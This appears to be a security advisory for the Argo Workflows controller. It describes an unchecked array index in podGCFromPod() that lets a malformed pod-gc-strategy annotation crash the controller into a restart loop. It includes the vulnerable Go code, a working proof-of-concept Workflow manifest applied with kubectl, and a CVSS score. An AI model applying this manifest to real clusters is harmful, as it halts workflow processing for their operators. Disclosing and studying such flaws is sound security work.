An unchecked array index in the pod informer's podGCFromPod() function causes a controller-wide panic when a workflow pod carries a malformed workflows.argoproj.io/pod-gc-strategy annotation. Because the panic occurs inside an informer goroutine (outside the controller's recover() scope), it crashes the entire controller process. The poisoned pod persists across restarts, causing a crash loop that halts all workflow processing until the pod is manually deleted.
podGCFromPod() splits the annotation value on "/" and unconditionally accesses parts[1]:
func podGCFromPod(pod *apiv1.Pod) wfv1.PodGC {
if val, ok := pod.Annotations[common.AnnotationKeyPodGCStrategy]; ok {
parts := strings.Split(val, "/")
return wfv1.PodGC{Strategy: wfv1.PodGCStrategy(parts[0]), DeleteDelayDuration: parts[1]}
}
return wfv1.PodGC{Strategy: wfv1.PodGCOnPodNone}
}
If the annotation value contains no "/", parts has length 1 and parts[1] panics with index out of range.
The code was introduced in #14129 and affects versions:
Apply this workflow to a cluster running the Argo Workflows controller:
kubectl apply -n argo -f - <<'EOF'
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
name: crash-podgc
spec:
entrypoint: main
serviceAccountName: default
podGC:
strategy: OnPodCompletion
podMetadata:
annotations:
workflows.argoproj.io/pod-gc-strategy: "NoSlash"
templates:
- name: main
container:
image: alpine:3.18
command: [echo, "hello"]
EOF
Within seconds the controller crashes. The controller pod will show CrashLoopBackOff with increasing restart count....
3.7.144.0.5Exploitability
AV:NAC:LPR:LUI:NScope
S:CImpact
C:NI:NA:H7.7/CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H